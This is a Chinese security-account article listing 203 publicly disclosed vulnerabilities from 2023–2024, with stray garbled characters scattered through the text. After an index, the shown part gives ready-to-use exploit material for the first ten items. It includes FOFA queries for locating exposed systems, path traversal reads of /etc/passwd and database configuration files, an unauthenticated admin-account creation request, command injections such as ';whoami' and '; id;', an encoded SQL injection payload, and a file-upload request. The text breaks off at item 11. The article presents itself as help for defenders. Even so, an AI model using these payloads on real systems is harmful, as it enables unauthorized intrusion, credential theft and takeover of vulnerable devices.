互联网公开漏洞整理202309-202406
" j& N( `. S3 A C9 G道一安全 2024-06-05 07:41 北京
; w! `4 j* o2 e' k1 \0 k N9 K以下文章来源于网络安全新视界 ,作者网络安全新视界
- ]" e4 S- \4 x2 R$ T! c. K" V5 X1 d, ]# Q6 _
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
& i+ c& \+ S3 R9 @! O- i1 M/ ?- f3 M( }# X$ s% c: |4 A4 n. Y8 r3 Z
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
- y+ g! P @8 b2 c/ W6 l }# |2 N2 ^- ^! g6 T8 V
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
+ ?; w4 E& g1 o6 h9 d7 \+ \3 M; C
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。 @5 z, n: I8 s2 I; O5 u' _
( ]; n" }6 _& F9 t4 C6 o7 s合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
. N V& G, ]/ B0 s7 l8 D4 O8 K+ x2 x2 x" u
+ l$ [9 @6 Z+ }/ G* ~2 w; I声明
; M( w) T) u R7 P. [! ~, y. |1 U- V1 U+ n4 m3 C$ f4 i
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。. ]4 r6 N# P3 n$ r
* t( R ]: m& r- W; U6 F
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。- D7 i; b, N' A' }. \; ~
0 \$ F! G3 v+ I4 ~* `
, |% n# T) e3 @! U. l8 q1 [9 r* M4 V' F+ E
目录
; u; R& Q6 U2 Q, I4 n2 K
& _: B8 h. v; S01
) A x. K3 f! t/ d
& R. v" p. R1 f1. StarRocks MPP数据库未授权访问
3 P! ~2 A5 ~/ ^' ^3 a& G& M- G2. Casdoor系统static任意文件读取- Q G: Z' @+ l* M$ s! {: C
3. EasyCVR智能边缘网关 userlist 信息泄漏8 s1 o4 q$ ]4 X+ x1 X5 Q
4. EasyCVR视频管理平台存在任意用户添加8 H" z. U6 b) x) I* b
5. NUUO NVR 视频存储管理设备远程命令执行
3 d' a6 _9 u+ G) t" C9 }4 i% W1 ~6. 深信服 NGAF 任意文件读取9 B8 j9 @* t3 }3 a( v9 u+ |6 U
7. 鸿运主动安全监控云平台任意文件下载+ A* W- F( f4 {0 B1 `
8. 斐讯 Phicomm 路由器RCE
0 T0 C; [1 D, u$ y X+ {4 Z& `# t9 X9. 稻壳CMS keyword 未授权SQL注入
6 R- q4 x! I" w9 v5 ?2 _- }0 j2 i: r10. 蓝凌EIS智慧协同平台api.aspx任意文件上传0 g; |) @0 g1 b0 S* i# {& r; m
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
3 V% P: n% P, P, H: l12. Jorani < 1.0.2 远程命令执行
6 U, P3 Y v t# ], j, ]+ C4 c* m13. 红帆iOffice ioFileDown任意文件读取" d% V" b' M! V7 L# u7 p
14. 华夏ERP(jshERP)敏感信息泄露
Z; g9 a! v4 W( _15. 华夏ERP getAllList信息泄露
- S& [# N0 y' s' g4 s. i0 N6 w2 D& z16. 红帆HFOffice医微云SQL注入( s! Y- O, c4 \/ T' t4 E
17. 大华 DSS itcBulletin SQL 注入
3 v1 x% M8 t$ D: O18. 大华 DSS 数字监控系统 user_edit.action 信息泄露: [' x" `8 j* z( V! X2 o
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 C9 d9 H S6 Z0 u7 `/ g20. 大华ICC智能物联综合管理平台任意文件读取
+ J- T- \ o6 w/ Z+ d! N/ D. m21. 大华ICC智能物联综合管理平台random远程代码执行4 O+ {! p/ C) W; u9 D6 a8 y9 l
22. 大华ICC智能物联综合管理平台 log4j远程代码执行) o6 V) G; c3 X& \
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 N( M( P+ I6 a4 p$ X" k0 g3 i24. 用友NC 6.5 accept.jsp任意文件上传: m a' B% H$ F; N! C! \
25. 用友NC registerServlet JNDI 远程代码执行
7 J/ e& P4 W! {26. 用友NC linkVoucher SQL注入% d/ W3 @# s' T! ]/ L' Z
27. 用友 NC showcontent SQL注入3 D/ j' m& I9 T! F, V- q- h. w. T! t8 @
28. 用友NC grouptemplet 任意文件上传. d% D+ U0 X4 [2 n9 c2 A- O: @
29. 用友NC down/bill SQL注入
# T) p$ w! g/ {; ^5 s6 R0 Q+ l30. 用友NC importPml SQL注入& z2 ? Y+ r! y% Y& I: ?* u; x( Y
31. 用友NC runStateServlet SQL注入& Y( y3 J9 W c) d `: O) N
32. 用友NC complainbilldetail SQL注入" M& `7 e+ Q7 m9 E7 N% M4 Q3 k5 n
33. 用友NC downTax/download SQL注入
! ?: w! h; n2 ?! v3 r3 f. Z/ b4 D- f34. 用友NC warningDetailInfo接口SQL注入
' @& B4 @- ] Q35. 用友NC-Cloud importhttpscer任意文件上传
, I6 f* g- j/ E, ~8 l/ t. [( U36. 用友NC-Cloud soapFormat XXE
+ k0 ~. W) ?+ Q9 u5 M37. 用友NC-Cloud IUpdateService XXE9 s( _4 \$ F4 ]) {, F
38. 用友U8 Cloud smartweb2.RPC.d XXE
* S, K# s. r8 u# S6 k( J; z39. 用友U8 Cloud RegisterServlet SQL注入* |/ Z0 K& ]5 o
40. 用友U8-Cloud XChangeServlet XXE
/ N$ R- s! T- a, z5 j1 v' X( o41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
- f0 v4 T ? X, e, O4 ~42. 用友GRP-U8 SmartUpload01 文件上传& ^$ E6 r3 N& k! D2 e# Z! _" S1 L
43. 用友GRP-U8 userInfoWeb SQL注入致RCE% ~) e7 e4 v! a2 H
44. 用友GRP-U8 bx_dj_check.jsp SQL注入$ i7 d& I+ S# |9 L j5 { X7 d6 Z' J
45. 用友GRP-U8 ufgovbank XXE' {. N/ N/ i6 p; A$ a: K) a
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
+ L& \7 C) s# K: k! L* l47. 用友GRP A++Cloud 政府财务云 任意文件读取7 G/ D3 ?% m: U+ L6 M
48. 用友U8 CRM swfupload 任意文件上传) r: _3 n) ]3 ~$ z8 k5 V
49. 用友U8 CRM系统uploadfile.php接口任意文件上传8 ~4 W c6 m- m5 b8 }) a
50. QDocs Smart School 6.4.1 filterRecords SQL注入1 y% h' R `7 F; t
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 C: k& F, G6 ~# s" ^$ ]$ j
52. 泛微E-Office json_common.php sql注入' x+ ^: }/ h4 F6 w: Z
53. 迪普 DPTech VPN Service 任意文件上传
2 K! q& m/ L' e A; P54. 畅捷通T+ getstorewarehousebystore 远程代码执行
9 ]2 h" _# R% h0 C( u6 Z55. 畅捷通T+ getdecallusers信息泄露
7 R/ H7 M7 J4 v+ n56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE& l% w6 h" g; }. `* G# d
57. 畅捷通T+ keyEdit.aspx SQL注入
: A" G8 V3 z! S' L58. 畅捷通T+ KeyInfoList.aspx sql注入
, d8 g7 l6 C/ ~6 y7 s59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行5 e3 M l- `9 n
60. 百卓Smart管理平台 importexport.php SQL注入% y7 D- V2 `/ H
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传6 e) l# `1 U+ Q& a+ ~7 \
62. IP-guard WebServer 远程命令执行
$ S# @4 U+ J8 o. Z5 S+ L2 u+ d7 e0 t63. IP-guard WebServer任意文件读取7 R& O( U: t* [' _2 s; l$ p
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
( i' `/ O0 U( H& a, m: ]65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
0 Y/ E) F# Z$ @) N66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入5 g7 ]: l' s4 G# Z. G ~& [
67. 万户ezOFFICE wpsservlet任意文件上传
6 }7 @+ ]8 }' x( v2 ?$ p9 `68. 万户ezOFFICE wf_printnum.jsp SQL注入9 A9 A6 ?' q; v( f
69. 万户 ezOFFICE contract_gd.jsp SQL注入. @. m$ {7 h8 U7 A, C( d( n5 _
70. 万户ezEIP success 命令执行3 S/ x ` B$ F
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入/ s8 l, C/ m ?' E4 T& ]6 p
72. 致远OA getAjaxDataServlet XXE$ \, p' U: \. X% \- _) G# R2 T
73. GeoServer wms远程代码执行' {) L( C( y: M7 q4 P$ m
74. 致远M3-server 6_1sp1 反序列化RCE) {9 t# Q5 B1 Y
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
% T4 C1 b9 |& @0 x3 g* A: Q1 E76. 新开普掌上校园服务管理平台service.action远程命令执行
0 p- Q) M. j/ ^# ]8 h" g) d77. F22服装管理软件系统UploadHandler.ashx任意文件上传8 x0 Z. g7 ]9 l" `
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传, N4 m* I2 e- n2 i Y7 h3 M
79. BYTEVALUE 百为流控路由器远程命令执行
* F$ F5 L$ C' ~ W Y80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
8 ~) R6 j; u" T W81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 W* K; K8 c8 Q3 H9 L5 g$ L
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行+ w, F7 M8 p' j8 w- J
83. JeecgBoot testConnection 远程命令执行) B T+ c7 m9 Z. s3 T$ W) W' H
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
( z% a* ^/ K: D! j) j4 U85. SysAid On-premise< 23.3.36远程代码执行 M- O/ q8 P: @* }6 x! Q4 e6 c
86. 日本tosei自助洗衣机RCE6 h" q1 m- M- s) W Q
87. 安恒明御安全网关aaa_local_web_preview文件上传
' V; m' K1 @' F' b! d88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
5 u' {" X, o) Z8 a% g! C89. 致远互联FE协作办公平台editflow_manager存在sql注入
) b$ d+ K; x* r* d( W% n5 @. N L( U$ h90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
# B0 f u. A; L( V# B91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取# a$ `2 b# e* G J3 v$ c' a
92. 海康威视运行管理中心session命令执行( ?/ S' W1 r3 t9 y
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传, K0 I$ A* w, w; H' s
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传, }6 `9 R! f, ^- `+ b
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行, V0 m% v! a. `5 d
96. Apache OFBiz 18.12.11 groovy 远程代码执行
# S6 f. U0 X1 g7 b3 w; c97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
. F6 l# y+ r/ {( m; t# O" V! Q98. SpiderFlow爬虫平台远程命令执行
8 E0 w) m) w$ e: n' Q3 ^99. Ncast盈可视高清智能录播系统busiFacade RCE! |) F2 p z/ X' j
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
, \/ c9 J5 e# t! p5 A9 `101. ivanti policy secure-22.6命令注入
6 n. v7 {! M$ h: w2 E102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行( v2 |) X1 X) [7 O- `$ _9 A) [
103. Ivanti Pulse Connect Secure VPN XXE" v. A4 f. @% d3 F; o2 L6 l$ A' f
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露8 u% B' M+ T* E4 J! G5 ?
105. SpringBlade v3.2.0 export-user SQL 注入
, w. O( s+ Z" G106. SpringBlade dict-biz/list SQL 注入! q& x+ q o }
107. SpringBlade tenant/list SQL 注入
i& G7 d0 _& @3 g, `3 X2 |+ n108. D-Tale 3.9.0 SSRF
1 |: V* t4 \3 D109. Jenkins CLI 任意文件读取
$ S. x# p" g1 y: U# V6 L( t& j5 K110. Goanywhere MFT 未授权创建管理员6 |+ s8 B) o, C
111. WordPress Plugin HTML5 Video Player SQL注入, G0 k& Q' X, n. o- `' ~: B
112. WordPress Plugin NotificationX SQL 注入
' T! t4 r0 ^' `113. WordPress Automatic 插件任意文件下载和SSRF$ m+ Y# `' s! N" U' I3 k6 X
114. WordPress MasterStudy LMS插件 SQL注入* k1 [: ~* V+ t' O. c6 `. l
115. WordPress Bricks Builder <= 1.9.6 RCE0 b* c1 o7 W9 m2 p
116. wordpress js-support-ticket文件上传
- T. o2 K1 W! e% q: t117. WordPress LayerSlider插件SQL注入
# r" N. c- U, a118. 北京百绰智能S210管理平台uploadfile.php任意文件上传! [) _! q! B/ V9 N. t
119. 北京百绰智能S20后台sysmanageajax.php sql注入
! M( s0 f! S N& j" [4 K9 H120. 北京百绰智能S40管理平台导入web.php任意文件上传
8 P/ a9 D* W: V6 t121. 北京百绰智能S42管理平台userattestation.php任意文件上传
! D' \4 {8 M; w: ^3 E122. 北京百绰智能s200管理平台/importexport.php sql注入8 X% n8 z x0 s% S
123. Atlassian Confluence 模板注入代码执行
8 ?$ w' ]* R D h; e _# \124. 湖南建研工程质量检测系统任意文件上传
' R9 q6 x7 v6 W# h& d C125. ConnectWise ScreenConnect身份验证绕过
% J6 d7 D ^) @; d/ L% V0 T0 h126. Aiohttp 路径遍历
, T3 K$ u \" t( H127. 广联达Linkworks DataExchange.ashx XXE
( X0 _1 r" U& B) d2 h128. Adobe ColdFusion 反序列化+ Z; b& d0 ~ ^$ R" {
129. Adobe ColdFusion 任意文件读取) ?- |: g) w6 t( G7 ^
130. Laykefu客服系统任意文件上传; B) ?) I/ O3 B! w8 m9 s1 S, Q
131. Mini-Tmall <=20231017 SQL注入
, Z% A" A+ N- |( t! b132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' ]+ [! e5 E! P- t( T1 W6 \# S
133. H5 云商城 file.php 文件上传! h% m" F1 k, Y+ d. q8 J
134. 网康NS-ASG应用安全网关index.php sql注入/ U: N# I; ^ j% f, r
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) J6 s8 x8 U/ Z$ k4 {
136. NextChat cors SSRF9 Z- l; J; J$ U9 s! k7 G* N2 C
137. 福建科立迅通信指挥调度平台down_file.php sql注入
8 [9 o0 B5 |0 @2 h: L: J0 S: i138. 福建科立讯通信指挥调度平台pwd_update.php sql注入- b. I, }. y. V: v& D4 a
139. 福建科立讯通信指挥调度平台editemedia.php sql注入* y" `# ^4 b& R" H+ T# R. G: {
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入& M$ Y) `+ [/ A( R- s
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入! E9 N. n: |5 i) ~1 n
142. CMSV6车辆监控平台系统中存在弱密码
- }- A2 F' H* H& i& v8 @5 p; ?- }1 n143. Netis WF2780 v2.1.40144 远程命令执行
; p, W; _% K) l- K7 Y144. D-Link nas_sharing.cgi 命令注入
1 t5 a3 |8 `$ B! W6 `145. Palo Alto Networks PAN-OS GlobalProtect 命令注入 e. X! F; p3 x6 q
146. MajorDoMo thumb.php 未授权远程代码执行( u' q+ }: L* \/ P
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历9 K" P: i: ]4 Z" |! B( Z
148. CrushFTP 认证绕过模板注入. C9 Y0 B9 l6 e( `
149. AJ-Report开源数据大屏存在远程命令执行
7 N* l/ r* f C8 i/ y2 l' A150. AJ-Report 1.4.0 认证绕过与远程代码执行: G: T2 V! p% \8 M4 d
151. AJ-Report 1.4.1 pageList sql注入2 [! O2 f k4 V: ?/ h3 z
152. Progress Kemp LoadMaster 远程命令执行 h; D+ S7 l4 c J9 I, f5 j/ B* } n9 S
153. gradio任意文件读取
) a( J# _' L3 O: q8 I" B# t S/ w154. 天维尔消防救援作战调度平台 SQL注入
; i; i* r1 ]+ \" u( I155. 六零导航页 file.php 任意文件上传" D/ y0 O6 h7 z
156. TBK DVR-4104/DVR-4216 操作系统命令注入
0 h J7 n2 U7 s157. 美特CRM upload.jsp 任意文件上传; v. k1 O- [/ N7 F: [6 h& L
158. Mura-CMS-processAsyncObject存在SQL注入1 @; }0 X; F" S- k5 v
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传4 u/ B3 u+ H# C% M. e3 d# ?
160. Sonatype Nexus Repository 3目录遍历与文件读取5 t' {. f0 \" t) j1 k$ |: E
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传. t1 X; L% l: e4 Y( H
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传: V# a+ Z& _+ ^& J2 B/ _0 ~. n; s9 w
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传1 O4 @" ~) v( Q- a/ z, @- h: C
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传' ~2 S9 H, o/ C0 _# c8 U& B5 v4 j
165. OrangeHRM 3.3.3 SQL 注入
8 [0 w6 ?& @2 k$ N5 O166. 中成科信票务管理平台SeatMapHandler SQL注入
% \0 u3 U- l8 r6 k4 Y167. 精益价值管理系统 DownLoad.aspx任意文件读取) ~( |* B& L& B; b! w* N
168. 宏景EHR OutputCode 任意文件读取* ] B4 j6 ^% m% P+ e0 r$ B. m3 k
169. 宏景EHR downlawbase SQL注入. O' W" {9 A6 T* p' x; r+ ?
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
5 G4 u" L, u' I# l171. 通天星CMSV6车载定位监控平台 SQL注入# f! [; {! R6 X6 [! W3 N4 n
172. DT-高清车牌识别摄像机任意文件读取
2 [1 A8 w7 b' E y5 E173. Check Point 安全网关任意文件读取
6 F; J* e% c: v0 ?174. 金和OA C6 FileDownLoad.aspx 任意文件读取
; c/ [# t& \$ h2 Y175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入& } V; a# `$ Z
176. 电信网关配置管理系统 rewrite.php 文件上传! d ]$ n4 Z& S! r: \1 E E& F8 v
177. H3C路由器敏感信息泄露; [# o/ f: e) @# e3 ?, E0 u+ a- J
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
/ o: m5 o, J* ]. a179. 建文工程管理系统存在任意文件读取
: R8 `% \/ [/ z. X180. 帮管客 CRM jiliyu SQL注入
0 P+ E3 W3 A( s. ]& {181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
7 f# K) Y* M- ~9 r8 H7 b182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 Y' X! y+ `% M5 C* x183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
4 t! A! O I+ @5 z/ B$ r- `# j3 e184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加: B: l) t, s% B% F
185. 瑞友天翼应用虚拟化系统SQL注入
0 W# l( i5 t" }* }- S186. F-logic DataCube3 SQL注入
7 e( ~0 G' S0 D' Z0 r& C187. Mura CMS processAsyncObject SQL注入2 Q/ }* \. ?+ }: k# L. D3 D, J" \
188. 叁体-佳会视频会议 attachment 任意文件读取/ C- C4 X# y8 R: a7 U
189. 蓝网科技临床浏览系统 deleteStudy SQL注入3 U w9 G; ^7 `7 }( g
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
" R- { D7 P* t: U191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入' p# A5 ~8 {; f; B; c* }* D
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传' S; `# b# G2 Z, Z5 F" x% e6 [
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
- Q( n4 o; [7 J1 L194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
, y+ h6 h/ u6 n195. 飞鱼星上网行为管理系统 send_order.cgi命令执行- d" H" K" T4 F) u
196. 河南省风速科技统一认证平台密码重置/ }' O0 E9 D4 K9 X7 p
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
6 e3 F/ q x! E198. 阿里云盘 WebDAV 命令注入
) H6 f% f7 p' ?/ o4 Z199. cockpit系统assetsmanager_upload接口 文件上传
: d2 @$ T) W2 q- f200. SeaCMS海洋影视管理系统dmku SQL注入
' _$ ?3 Z) r/ d* e, I. d! C201. 方正全媒体新闻采编系统 binary SQL注入
9 m! W+ V# j$ e202. 微擎系统 AccountEdit任意文件上传0 \9 h0 X3 @$ C2 F
203. 红海云EHR PtFjk 文件上传
/ {5 h/ E9 a b/ [2 l& S+ P& i% _) c& [$ Q* ]
POC列表, m. Y. d, N. o1 F0 N8 m
7 q# V% x) t& x02
: U) |7 E9 ?$ Y0 q5 C
) `) W/ \! Z9 @6 G% M1. StarRocks MPP数据库未授权访问0 v- G6 D! c+ k+ D. [ j
FOFA :title="StarRocks"
9 `- ?8 L8 Y7 v' ~) L, n. x; gGET /mem_tracker HTTP/1.11 T# K) S7 @5 Z6 ]8 p
Host: URL# Q* R- l9 O9 ?" b
- \% v/ ~; K: k# P$ |" I8 r2 E
6 `8 z Z! Y" S0 G. f! n2. Casdoor系统static任意文件读取) X) J; r: d3 f: U0 r3 K: B6 ]
FOFA :title="Casdoor"- h; E1 [4 ?; u2 y4 T4 c& a
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" F( c9 T7 ~3 |% A* z
Host: xx.xx.xx.xx:9999
2 x' |+ `+ U% @/ J- Y1 c4 fUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. g" ~$ g9 t# I" B5 ~4 _! P) n3 jConnection: close! H# P S2 u" g7 l
Accept: */*/ K/ w1 i% m% q# B9 `) I6 T# J1 q
Accept-Language: en- d( q. C! y$ A
Accept-Encoding: gzip
6 f8 ]3 b7 ]7 I' a5 k9 ?$ w8 ~3 N8 n: N. l7 y3 o9 U9 C( R
8 L2 S( O. ]9 B- s" Q9 N. l
3. EasyCVR智能边缘网关 userlist 信息泄漏
, }4 l! Y8 Z6 Q$ nFOFA :title="EasyCVR"; E# Q2 E0 O3 [6 d
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.16 x1 Z z! N9 W+ o0 x+ X
Host: xx.xx.xx.xx* I& M3 u& b, D* T+ S, k0 [
! `+ e+ M: y; a% y. k3 `) c# t8 r, d
( }2 j( R% z" u- P/ ~4. EasyCVR视频管理平台存在任意用户添加/ `- o7 [2 t) N$ C4 W3 `0 l# z
FOFA :title="EasyCVR"& M+ ?7 f. z8 A9 U2 b
, [! p- i* t- b% F7 |3 E1 L4 Upassword更改为自己的密码md5! r- X j$ c+ f/ l( y, c
POST /api/v1/adduser HTTP/1.17 U* s$ e1 \4 n' S+ J X+ i
Host: your-ip$ F) T2 a+ z/ S2 o
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Y$ y+ K! n# q: }, \2 C5 P c7 i" h
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=16 G6 G0 m6 \5 G- ?1 j, I5 T$ s5 k
6 e7 d- F% f5 C; c" Z1 }
9 V" N4 B) c. V5 A h f* v5. NUUO NVR 视频存储管理设备远程命令执行% G) ]/ B- t- t+ W. b
FOFA:title="Network Video Recorder Login". v3 ?4 o( L: u2 L* r
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: q' p+ n* ^, O# HHost: xx.xx.xx.xx* B) `% Q) b# P; t
. v, h, \* P3 W6 X! v
' c, s7 A' H/ e% V6. 深信服 NGAF 任意文件读取
' D7 f( w [; H) U4 LFOFA:title="SANGFOR | NGAF"' p6 Y7 S- ]# X) ]1 e' L/ _
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
9 l- p2 ?, g0 z' `! U: hHost:. P1 i0 V6 D6 }4 P9 f
$ ^ V: M( p& E
- O2 m+ t! `* |, V# A5 N% Q8 R7. 鸿运主动安全监控云平台任意文件下载
l* c# S0 P$ J* _FOFA:body="./open/webApi.html"# e! d% u9 z. K+ d; m
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
4 p& h/ } n, f! X7 dHost:6 E' C R4 K( N/ [$ l- j
9 t. q4 p8 Z6 M$ W" [/ w5 R# D8 B
' l+ P$ {6 J" W# R& M; E
8. 斐讯 Phicomm 路由器RCE
* r7 e+ S/ g' w( F$ mFOFA:icon_hash="-1344736688"
2 F' [4 w1 w1 t8 B8 P, _8 ^默认账号admin登录后台后,执行操作
* }, C) { W) K! uPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1( [& ^! D! N& V' t: B
Host: x.x.x.x
6 f- L3 _( V: o' n2 n" dCookie: sysauth=第一步登录获取的cookie! G- o$ Z+ Z5 M8 a: R' K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz7 L* `1 l/ i9 T+ I) }
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" j& f; n; m w. |4 o+ b7 n
- ^' h2 S% V" [$ v; c2 l
------WebKitFormBoundaryxbgjoytz6 h( ]% z4 H2 Y% q& f2 n
Content-Disposition: form-data; name="wifiRebootEnablestatus"
4 G# A- d% f0 Y' Q. I* T5 S( p) c* X8 v% N0 O4 M. Y' {7 m6 r# B
%s" w# O- G. k* c3 o5 _7 y
------WebKitFormBoundaryxbgjoytz
6 P7 v* T! _- M# i5 J6 FContent-Disposition: form-data; name="wifiRebootrange"# N1 R; ^. X" B3 `# X) M B: k* ^
& k0 G1 `" \! t% ^' o9 K7 E8 _12:00; id;
/ J# y/ J" W: A6 @. k- g6 R------WebKitFormBoundaryxbgjoytz5 H( G- V( M9 A1 {' S' s
Content-Disposition: form-data; name="wifiRebootendrange"
& i1 I" W: X4 u" X \" {) U
9 M2 a; i0 x6 G%s:/ S( p$ V! T) P0 P
------WebKitFormBoundaryxbgjoytz& ]# Q$ p( i' D9 _' _$ v
Content-Disposition: form-data; name="cururl2"7 {1 r0 a* N3 S9 }0 y3 Q7 K8 M- |4 H/ @
" c$ ^2 m h- ^! ?$ }5 a
. o/ ~9 h8 U' @2 o) ]1 Z4 C! [------WebKitFormBoundaryxbgjoytz--
7 v; X- Z. P, i6 ^4 \5 v8 C4 F' D
/ N! k# W2 \) a' p4 S; h* J& w( q& @ V! t
9. 稻壳CMS keyword 未授权SQL注入. i7 L: |- G6 j
FOFA:app="Doccms"
; d& i6 T9 W1 F' C% ^GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
4 ]. c! \+ z9 X% [- gHost: x.x.x.x
; G8 O4 K. z" D( n7 P- Y. P
/ O- J9 D! S6 [' p& ?3 O1 Q' C8 J. ?: |3 R+ i2 j
payload为下列语句的二次Url编码2 q% S: H1 W0 j/ f& r) W& g/ P9 r7 P
- I' J) i1 P) T! _. f% J& d' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
3 T7 k/ B. ?" V) M. }. v& d
9 p& {6 p6 D+ g# I2 ]& ^10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
% P1 d; l5 L3 Q5 F* L( NFOFA:icon_hash="953405444"
7 r, Q# }# [) ^' w0 d% E9 k; N: W1 G/ h, y
文件上传后响应中包含上传文件的路径% y6 e- O* E5 [( [
POST /eis/service/api.aspx?action=saveImg HTTP/1.16 ]0 r8 u7 }* O
Host: x.x.x.x:xx4 L8 O) `5 n, C- T! m5 l0 w' X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
9 N7 [! f4 b5 W1 F/ o CContent-Length: 197
c* a2 X% u8 H0 _8 O5 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
. {' \. N; o0 p: FAccept-Encoding: gzip, deflate8 H8 I8 V7 R2 ]: w
Accept-Language: zh-CN,zh;q=0.99 Y8 b4 l/ B) [5 e# x" {
Connection: close
( k) n7 r2 G* [3 }9 g8 W/ F! T0 iContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu7 E; W1 {1 ^4 |9 f4 m5 J$ g
- b( z2 L5 \# o N! [
------WebKitFormBoundaryxdgaqmqu6 U m4 w; j6 x5 ^8 h F1 `+ S
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
0 i7 j" I+ `( C9 MContent-Type: text/html
/ a% N5 k8 S2 K! @7 n0 T
# c" b0 L: s9 _% Pjmnqjfdsupxgfidopeixbgsxbf6 V5 w* x% q0 N# X
------WebKitFormBoundaryxdgaqmqu--5 B1 M( Y1 a2 L8 A" C% T4 s ]: _7 K# n1 b
0 b3 @/ l' v/ _
8 q1 }( I' | y, G11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
